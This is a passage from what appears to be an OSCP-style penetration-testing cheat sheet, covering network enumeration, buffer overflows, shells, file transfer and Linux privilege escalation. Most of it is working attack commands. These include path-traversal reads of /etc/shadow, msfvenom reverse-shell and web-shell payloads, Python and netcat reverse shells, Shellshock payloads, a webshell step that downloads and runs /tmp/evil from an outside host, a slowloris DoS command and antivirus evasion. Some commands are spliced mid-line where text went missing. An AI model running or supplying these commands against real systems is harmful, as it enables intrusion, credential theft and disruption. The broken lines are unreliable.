406 |
407 | - Scan with Active connect in order to weed out any spoofed ports designed to troll you
408 | `nmap -p1-65535 -A -T5 -sT $ip`
409 |
410 | - Enumeration
411 | -----------
412 |
413 | - DNS Enumeration
414 |
415 | - NMAP DNS Hostnames Lookup
416 | `nmap -F --dns-server `
417 |
418 | - Host Lookup
419 | `host -t ns megacorpone.com`
420 |
421 | - Reverse Lookup Brute Force - find domains in the same range
422 | `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
423 |
424 | - Perform DNS IP Lookup
425 | `dig a domain-name-here.com @nameserver`
426 |
427 | - Perform MX Record Lookup
428 | `dig mx domain-name-here.com @nameserver`
429 |
430 | - Perform Zone Transfer with DIG
431 | `dig axfr domain-name-here.com @nameserver`
432 |
433 | - DNS Zone Transfers
434 | Windows DNS zone transfer
435 |
436 | `nslookup -> set type=any -> ls -d blah.com `
437 |
438 | Linux DNS zone transfer
439 |
440 | `dig axfr blah.com @ns1.blah.com`
441 |
442 | - Dnsrecon DNS Brute Force
443 | `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml`
444 |
445 | - Dnsrecon DNS List of megacorp
446 | `dnsrecon -d megacorpone.com -t axfr`
447 |
448 | - DNSEnum
449 | `dnsenum zonetransfer.me`
450 |
451 | - NMap Enumeration Script List:
452 |
453 | - NMap Discovery
454 | [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)
455 |
456 | - Nmap port version detection MAXIMUM power
457 | `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p `
458 |
459 |
460 | - NFS (Network File System) Enumeration
461 |
462 | - Show Mountable NFS Shares
463 | `nmap -sV --script=nfs-showmount $ip`
464 |
465 | - RPC (Remote Procedure Call) Enumeration
466 |
467 | - Connect to an RPC share without a username and password and enumerate privledges
468 | `rpcclient --user="" --command=enumprivs -N $ip`
469 |
470 | - Connect to an RPC share with a username and enumerate privledges
471 | `rpcclient --user="" --command=enumprivs $ip`
472 |
473 |
474 | - SMB Enumeration
475 |
476 | - SMB OS Discovery
477 | `nmap $ip --script smb-os-discovery.nse`
478 |
479 | - Nmap port scan
480 | `nmap -v -p 139,445 -oG smb.txt $ip-254`
481 |
482 | - Netbios Information Scanning
483 | `nbtscan -r $ip/24`
484 |
485 | - Nmap find exposed Netbios servers
486 | `nmap -sU --script nbstat.nse -p 137 $ip`
487 |
488 | - Nmap all SMB scripts scan
489 |
490 | `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
491 |
492 | - Nmap all SMB scripts authenticated scan
493 |
494 | `nmap -sV -Pn -vv -p 445 --script-args smbuser=,smbpass= --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
495 |
496 | - SMB Enumeration Tools
497 | `nmblookup -A $ip `
498 |
499 | `smbclient //MOUNT/share -I $ip -N `
500 |
501 | `rpcclient -U "" $ip `
502 |
503 | `enum4linux $ip `
504 |
505 | `enum4linux -a $ip`
506 |
507 |
508 | - SMB Finger Printing
509 | `smbclient -L //$ip`
510 |
511 | - Nmap Scan for Open SMB Shares
512 | `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`
513 |
514 | - Nmap scans for vulnerable SMB Servers
515 | `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
516 |
517 | - Nmap List all SMB scripts installed
518 | `ls -l /usr/share/nmap/scripts/smb*`
519 |
520 | - Enumerate SMB Users
521 |
522 | `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`
523 |
524 | OR
525 |
526 | `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`
527 |
528 |
529 | - RID Cycling - Null Sessions
530 | `ridenum.py $ip 500 50000 dict.txt`
531 |
532 | - Manual Null Session Testing
533 |
534 | Windows: `net use \\$ip\IPC$ "" /u:""`
535 |
536 | Linux: `smbclient -L //$ip`
537 |
538 |
539 | - SMTP Enumeration - Mail Severs
540 |
541 | - Verify SMTP port using Netcat
542 | `nc -nv $ip 25`
543 |
544 | - POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet
545 |
546 | root@kali:~# telnet $ip 110
547 | +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
548 | USER billydean
549 | +OK
550 | PASS password
551 | +OK Welcome billydean
552 |
553 | list
554 |
555 | +OK 2 1807
556 | 1 786
557 | 2 1021
558 |
559 | retr 1
560 |
561 | +OK Message follows
562 | From: jamesbrown@motown.com
563 | Dear Billy Dean,
564 |
565 | Here is your login for remote desktop ... try not to forget it this time!
566 | username: billydean
567 | password: PA$$W0RD!Z
568 |
569 |
570 | - SNMP Enumeration -Simple Network Management Protocol
571 |
572 | - Fix SNMP output values so they are human readable
573 | `apt-get install snmp-mibs-downloader download-mibs `
574 | `echo "" > /etc/snmp/snmp.conf`
575 |
576 | - SNMP Enumeration Commands
577 |
578 | - `snmpcheck -t $ip -c public`
579 |
580 | - `snmpwalk -c public -v1 $ip 1|`
581 |
582 | - `grep hrSWRunName|cut -d\* \* -f`
583 |
584 | - `snmpenum -t $ip`
585 |
586 | - `onesixtyone -c names -i hosts`
587 |
588 | - SNMPv3 Enumeration
589 | `nmap -sV -p 161 --script=snmp-info $ip/24`
590 |
591 | - Automate the username enumeration process for SNMPv3:
592 | `apt-get install snmp snmp-mibs-downloader `
593 | `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`
594 |
595 | - SNMP Default Credentials
596 | /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
597 |
598 |
599 | - MS SQL Server Enumeration
600 |
601 | - Nmap Information Gathering
602 |
603 | `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`
604 |
605 | - Webmin and miniserv/0.01 Enumeration - Port 10000
606 |
607 | Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
608 |
609 | `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
610 |
611 | Test to see if webmin is running as root by grabbing /etc/shadow
612 |
613 | `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
614 |
615 | - Linux OS Enumeration
616 |
617 | - List all SUID files
618 | `find / -perm -4000 2>/dev/null`
619 |
620 | - Determine the current version of Linux
621 | `cat /etc/issue`
622 |
623 | - Determine more information about the environment
624 | `uname -a`
625 |
626 | - List processes running
627 | `ps -xaf`
628 |
629 | - List the allowed (and forbidden) commands for the invoking use
630 | `sudo -l`
631 |
632 | - List iptables rules
633 | `iptables --table nat --list
634 | iptables -vL -t filter
635 | iptables -vL -t nat
636 | iptables -vL -t mangle
637 | iptables -vL -t raw
638 | iptables -vL -t security`
639 |
640 | - Windows OS Enumeration
641 |
642 |
643 | - net config Workstation
644 |
645 | - systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
646 |
647 | - hostname
648 |
649 | - net users
650 |
651 | - ipconfig /all
652 |
653 | - route print
654 |
655 | - arp -A
656 |
657 | - netstat -ano
658 |
659 | - netsh firewall show state
660 |
661 | - netsh firewall show config
662 |
663 | - schtasks /query /fo LIST /v
664 |
665 | - tasklist /SVC
666 |
667 | - net start
668 |
669 | - DRIVERQUERY
670 |
671 | - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
672 |
673 | - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
674 |
675 | - dir /s *pass* == *cred* == *vnc* == *.config*
676 |
677 | - findstr /si password *.xml *.ini *.txt
678 |
679 | - reg query HKLM /f password /t REG_SZ /s
680 |
681 | - reg query HKCU /f password /t REG_SZ /s
682 |
683 | - Vulnerability Scanning with Nmap
684 |
685 | - Nmap Exploit Scripts
686 | [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
687 |
688 | - Nmap search through vulnerability scripts
689 | `cd /usr/share/nmap/scripts/
690 | ls -l \*vuln\*`
691 |
692 | - Nmap search through Nmap Scripts for a specific keyword
693 | `ls /usr/share/nmap/scripts/\* | grep ftp`
694 |
695 | - Scan for vulnerable exploits with nmap
696 | `nmap --script exploit -Pn $ip`
697 |
698 | - NMap Auth Scripts
699 | [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
700 |
701 | - Nmap Vuln Scanning
702 | [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
703 |
704 | - NMap DOS Scanning
705 | `nmap --script dos -Pn $ip
706 | NMap Execute DOS Attack
707 | nmap --max-parallelism 750 -Pn --script http-slowloris --script-args
708 | http-slowloris.runforever=true`
709 |
710 | - Scan for coldfusion web vulnerabilities
711 | `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
712 |
713 | - Anonymous FTP dump with Nmap
714 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
715 |
716 | - SMB Security mode scan with Nmap
717 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
718 |
719 | - File Enumeration
720 |
721 | - Find UID 0 files root execution
722 |
723 | - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null`
724 |
725 | - Get handy linux file system enumeration script (/var/tmp)
726 | `wget https://highon.coffee/downloads/linux-local-enum.sh `
727 | `chmod +x ./linux-local-enum.sh `
728 | `./linux-local-enum.sh`
729 |
730 | - Find executable files updated in August
731 | `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
732 |
733 | - Find a specific file on linux
734 | `find /. -name suid\*`
735 |
736 | - Find all the strings in a file
737 | `strings `
738 |
739 | - Determine the type of a file
740 | `file `
741 |
742 | - HTTP Enumeration
743 | ----------------
744 |
745 | - Search for folders with gobuster:
746 | `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
747 |
748 | - OWasp DirBuster - Http folder enumeration - can take a dictionary file
749 |
750 | - Dirb - Directory brute force finding using a dictionary file
751 | `dirb http://$ip/ wordlist.dict `
752 | `dirb `
753 |
754 | Dirb against a proxy
755 |
756 | - `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`
757 |
758 | - Nikto
759 | `nikto -h $ip`
760 |
761 | - HTTP Enumeration with NMAP
762 | `nmap --script=http-enum -p80 -n $ip/24`
763 |
764 | - Nmap Check the server methods
765 | `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
766 |
767 | - Get Options available from web server
768 | `curl -vX OPTIONS vm/test`
769 |
770 | - Uniscan directory finder:
771 | `uniscan -qweds -u `
772 |
773 | - Wfuzz - The web brute forcer
774 |
775 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
776 |
777 | `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
778 |
779 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
780 |
781 | `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`
782 |
783 | Recurse level 3
784 |
785 | `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`
786 |
787 |
788 |
789 | - Open a service using a port knock (Secured with Knockd)
790 | for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201
791 | --max-retries 0 -p $x server\_ip\_address; done
792 |
793 | - WordPress Scan - Wordpress security scanner
794 |
795 | - wpscan --url $ip/blog --proxy $ip:3129
796 |
797 | - RSH Enumeration - Unencrypted file transfer system
798 |
799 | - auxiliary/scanner/rservices/rsh\_login
800 |
801 | - Finger Enumeration
802 |
803 | - finger @$ip
804 |
805 | - finger batman@$ip
806 |
807 | - TLS & SSL Testing
808 |
809 | - ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha >
810 | OUTPUT-FILE.html
811 |
812 | - Proxy Enumeration (useful for open proxies)
813 |
814 | - nikto -useproxy http://$ip:3128 -h $ip
815 |
816 | - Steganography
817 |
818 | > apt-get install steghide
819 | >
820 | > steghide extract -sf picture.jpg
821 | >
822 | > steghide info picture.jpg
823 | >
824 | > apt-get install stegosuite
825 |
826 | - The OpenVAS Vulnerability Scanner
827 |
828 | - apt-get update
829 | apt-get install openvas
830 | openvas-setup
831 |
832 | - netstat -tulpn
833 |
834 | - Login at:
835 | https://$ip:9392
836 |
837 | Buffer Overflows and Exploits
838 | ===================================================================================================================================
839 |
840 | - DEP and ASLR - Data Execution Prevention (DEP) and Address Space
841 | Layout Randomization (ASLR)
842 |
843 |
844 | - Nmap Fuzzers:
845 |
846 | - NMap Fuzzer List
847 | [https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)
848 |
849 | - NMap HTTP Form Fuzzer
850 | nmap --script http-form-fuzzer --script-args
851 | 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'
852 | -p 80 $ip
853 |
854 | - Nmap DNS Fuzzer
855 | nmap --script dns-fuzz --script-args timelimit=2h $ip -d
856 |
857 | - MSFvenom
858 | [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
859 |
860 | - Windows Buffer Overflows
861 |
862 | - Controlling EIP
863 |
864 | locate pattern_create
865 | pattern_create.rb -l 2700
866 | locate pattern_offset
867 | pattern_offset.rb -q 39694438
868 |
869 | - Verify exact location of EIP - [\*] Exact match at offset 2606
870 |
871 | buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
872 |
873 | - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
874 |
875 | - Use Mona to determine a module that is unprotected
876 |
877 | - Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
878 |
879 | - Use NASM to determine the HEX code for a JMP ESP instruction
880 |
881 | /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
882 |
883 | JMP ESP
884 | 00000000 FFE4 jmp esp
885 |
886 | - Run Mona in immunity log window to find (FFE4) XEF command
887 |
888 | !mona find -s "\xff\xe4" -m slmfc.dll
889 | found at 0x5f4a358f - Flip around for little endian format
890 | buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
891 |
892 | - MSFVenom to create payload
893 |
894 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
895 |
896 | - Final Payload with NOP slide
897 |
898 | buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
899 |
900 | - Create a PE Reverse Shell
901 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
902 | -f
903 | exe -o shell\_reverse.exe
904 |
905 | - Create a PE Reverse Shell and Encode 9 times with
906 | Shikata\_ga\_nai
907 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
908 | -f
909 | exe -e x86/shikata\_ga\_nai -i 9 -o
910 | shell\_reverse\_msf\_encoded.exe
911 |
912 | - Create a PE reverse shell and embed it into an existing
913 | executable
914 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f
915 | exe -e x86/shikata\_ga\_nai -i 9 -x
916 | /usr/share/windows-binaries/plink.exe -o
917 | shell\_reverse\_msf\_encoded\_embedded.exe
918 |
919 | - Create a PE Reverse HTTPS shell
920 | msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
921 | LPORT=443 -f exe -o met\_https\_reverse.exe
922 |
923 | - Linux Buffer Overflows
924 |
925 | - Run Evans Debugger against an app
926 | edb --run /usr/games/crossfire/bin/crossfire
927 |
928 | - ESP register points toward the end of our CBuffer
929 | add eax,12
930 | jmp eax
931 | 83C00C add eax,byte +0xc
932 | FFE0 jmp eax
933 |
934 | - Check for “Bad Characters” Process of elimination - Run multiple
935 | times 0x00 - 0xFF
936 |
937 | - Find JMP ESP address
938 | "\\x97\\x45\\x13\\x08" \# Found at Address 08134597
939 |
940 | - crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +
941 | "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"
942 |
943 | - msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b
944 | "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai
945 |
946 | - Connect to the shell with netcat:
947 | nc -v $ip 4444
948 |
949 | Shells
950 | ===================================================================================================================================
951 |
952 | - Netcat Shell Listener
953 |
954 | `nc -nlvp 4444`
955 |
956 | - Spawning a TTY Shell - Break out of Jail or limited shell
957 | You should almost always upgrade your shell after taking control of an apache or www user.
958 |
959 | (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
960 |
961 | (hint: sudo -l to see what you can run)
962 |
963 | - You may encounter limited shells that use rbash and only allow you to execute a single command per session.
964 | You can overcome this by executing an SSH shell to your localhost:
965 |
966 | ssh user@$ip nc $localip 4444 -e /bin/sh
967 | enter user's password
968 | python -c 'import pty; pty.spawn("/bin/sh")'
969 | export TERM=linux
970 |
971 | `python -c 'import pty; pty.spawn("/bin/sh")'`
972 |
973 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
974 |
975 | `echo os.system('/bin/bash')`
976 |
977 | `/bin/sh -i`
978 |
979 | `perl —e 'exec "/bin/sh";'`
980 |
981 | perl: `exec "/bin/sh";`
982 |
983 | ruby: `exec "/bin/sh"`
984 |
985 | lua: `os.execute('/bin/sh')`
986 |
987 | From within IRB: `exec "/bin/sh"`
988 |
989 |
990 | From within vi: `:!bash`
991 | or
992 |
993 | `:set shell=/bin/bash:shell`
994 |
995 | From within vim `':!bash':`
996 |
997 | From within nmap: `!sh`
998 |
999 | From within tcpdump
1000 |
1001 | echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
1002 |
1003 | From busybox `/bin/busybox telnetd -|/bin/sh -p9999`
1004 |
1005 | - Pen test monkey PHP reverse shell
1006 | [http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
1007 |
1008 | - php-findsock-shell - turns PHP port 80 into an interactive shell
1009 | [http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
1010 |
1011 | - Perl Reverse Shell
1012 | [http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
1013 |
1014 | - PHP powered web browser Shell b374k with file upload etc.
1015 | [https://github.com/b374k/b374k](https://github.com/b374k/b374k)
1016 |
1017 | - Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
1018 | https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
1019 |
1020 | - Web Backdoors from Fuzzdb
1021 | https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
1022 |
1023 | - Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
1024 |
1025 | *Linux*
1026 |
1027 | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf`
1028 |
1029 | *Windows*
1030 |
1031 | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe`
1032 |
1033 | *Mac*
1034 |
1035 | `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho`
1036 |
1037 | **Web Payloads**
1038 |
1039 | *PHP*
1040 |
1041 | `msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php`
1042 |
1043 | OR
1044 |
1045 | `msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php`
1046 |
1047 | Then we need to add the shell.php && pbpaste >> shell.php`
1050 |
1051 | *ASP*
1052 |
1053 | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp`
1054 |
1055 | *JSP*
1056 |
1057 | `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp`
1058 |
1059 | *WAR*
1060 |
1061 | `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war`
1062 |
1063 | **Scripting Payloads**
1064 |
1065 | *Python*
1066 |
1067 | `msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py`
1068 |
1069 | *Bash*
1070 |
1071 | `msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh`
1072 |
1073 | *Perl*
1074 |
1075 | `msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl`
1076 |
1077 | **Shellcode**
1078 |
1079 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
1080 |
1081 | *Linux Based Shellcode*
1082 |
1083 | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f `
1084 |
1085 | *Windows Based Shellcode*
1086 |
1087 | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f `
1088 |
1089 | *Mac Based Shellcode*
1090 |
1091 | `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f `
1092 |
1093 | **Handlers**
1094 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
1095 |
1096 | use exploit/multi/handler
1097 | set PAYLOAD
1098 | set LHOST
1099 | set LPORT
1100 | set ExitOnSession false
1101 | exploit -j -z
1102 |
1103 | Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
1104 |
1105 | - SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
1106 |
1107 | use auxiliary/scanner/ssh/ssh_login
1108 | use post/multi/manage/shell_to_meterpreter
1109 |
1110 | - Shellshock
1111 |
1112 | - Testing for shell shock with NMap
1113 |
1114 | `root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`
1115 |
1116 | - git clone https://github.com/nccgroup/shocker
1117 |
1118 | `./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`
1119 |
1120 | - Shell Shock SSH Forced Command
1121 | Check for forced command by enabling all debug output with ssh
1122 |
1123 | ssh -vvv
1124 | ssh -i noob noob@$ip '() { :;}; /bin/bash'
1125 |
1126 | - cat file (view file contents)
1127 |
1128 | echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$( 80, :DocumentRoot => Dir.pwd).start"
1152 |
1153 | - Run a basic PHP http server
1154 | php -S $ip:80
1155 |
1156 | - Creating a wget VB Script on Windows:
1157 | [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
1158 |
1159 | - Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
1160 |
1161 | echo Set args = Wscript.Arguments >> webdl.vbs
1162 | timeout 1
1163 | echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
1164 | timeout 1
1165 | echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
1166 | timeout 1
1167 | echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
1168 | timeout 1
1169 | echo xHttp.Open "GET", Url, False >> webdl.vbs
1170 | timeout 1
1171 | echo xHttp.Send >> webdl.vbs
1172 | timeout 1
1173 | echo with bStrm >> webdl.vbs
1174 | timeout 1
1175 | echo .type = 1 ' >> webdl.vbs
1176 | timeout 1
1177 | echo .open >> webdl.vbs
1178 | timeout 1
1179 | echo .write xHttp.responseBody >> webdl.vbs
1180 | timeout 1
1181 | echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
1182 | timeout 1
1183 | echo end with >> webdl.vbs
1184 | timeout 1
1185 | echo
1186 |
1187 | The file can be run using the following syntax:
1188 |
1189 | `C:\temp\cscript.exe webdl.vbs`
1190 |
1191 | - Mounting File Shares
1192 |
1193 | - Mount NFS share to /mnt/nfs
1194 | mount $ip:/vol/share /mnt/nfs
1195 |
1196 | - HTTP Put
1197 | nmap -p80 $ip --script http-put --script-args
1198 | http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
1199 |
1200 | - Uploading Files
1201 | -------------------------------------------------------------------------------------------------------------
1202 |
1203 | - SCP
1204 |
1205 | scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
1206 |
1207 | scp localfile username@$ip:~/Folder/
1208 |
1209 | scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~
1210 |
1211 |
1212 | - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
1213 |
1214 | `davtest -move -sendbd auto -url http://$ip`
1215 |
1216 | https://github.com/cldrn/davtest
1217 |
1218 | You can also upload a file using the PUT method with the curl command:
1219 |
1220 | `curl -T 'leetshellz.txt' 'http://$ip'`
1221 |
1222 | And rename it to an executable file using the MOVE method with the curl command:
1223 |
1224 | `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`
1225 |
1226 | - Upload shell using limited php shell cmd
1227 | use the webshell to download and execute the meterpreter
1228 | \[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O
1229 | /tmp/evil" http://$ip/files/sh.php
1230 | \[curl -s --data "cmd=chmod 777 /tmp/evil"
1231 | http://$ip/files/sh.php
1232 | curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
1233 |
1234 | - TFTP
1235 | mkdir /tftp
1236 | atftpd --daemon --port 69 /tftp
1237 | cp /usr/share/windows-binaries/nc.exe /tftp/
1238 | EX. FROM WINDOWS HOST:
1239 | C:\\Users\\Offsec>tftp -i $ip get nc.exe
1240 |
1241 | - FTP
1242 | apt-get update && apt-get install pure-ftpd
1243 |
1244 | \#!/bin/bash
1245 | groupadd ftpgroup
1246 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser
1247 | pure-pw useradd offsec -u ftpuser -d /ftphome
1248 | pure-pw mkdb
1249 | cd /etc/pure-ftpd/auth/
1250 | ln -s ../conf/PureDB 60pdb
1251 | mkdir -p /ftphome
1252 | chown -R ftpuser:ftpgroup /ftphome/
1253 |
1254 | /etc/init.d/pure-ftpd restart
1255 |
1256 | - Packing Files
1257 | -------------------------------------------------------------------------------------------------------------
1258 |
1259 | - Ultimate Packer for eXecutables
1260 | upx -9 nc.exe
1261 |
1262 | - exe2bat - Converts EXE to a text file that can be copied and
1263 | pasted
1264 | locate exe2bat
1265 | wine exe2bat.exe nc.exe nc.txt
1266 |
1267 | - Veil - Evasion Framework -
1268 | https://github.com/Veil-Framework/Veil-Evasion
1269 | apt-get -y install git
1270 | git clone https://github.com/Veil-Framework/Veil-Evasion.git
1271 | cd Veil-Evasion/
1272 | cd setup
1273 | setup.sh -c
1274 |
1275 | Privilege Escalation
1276 | ==================================================================================================================
1277 |
1278 | *Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*
1279 |
1280 |
1281 | - Linux Privilege Escalation
1282 | ------------------------------------------------------------------------------------------------------------------------
1283 |
1284 | - Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:
1285 | [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
1286 |
1287 | - Try the obvious - Maybe the user can sudo to root:
1288 |
1289 | `sudo su`
1290 |
1291 | - Here are the commands I have learned to use to perform linux enumeration and privledge escalation:
1292 |
1293 | What services are running as root?:
1294 |
1295 | `ps aux | grep root`
1296 |
1297 | What files run as root / SUID / GUID?:
1298 |
1299 | find / -perm +2000 -user root -type f -print
1300 | find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
1301 | find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
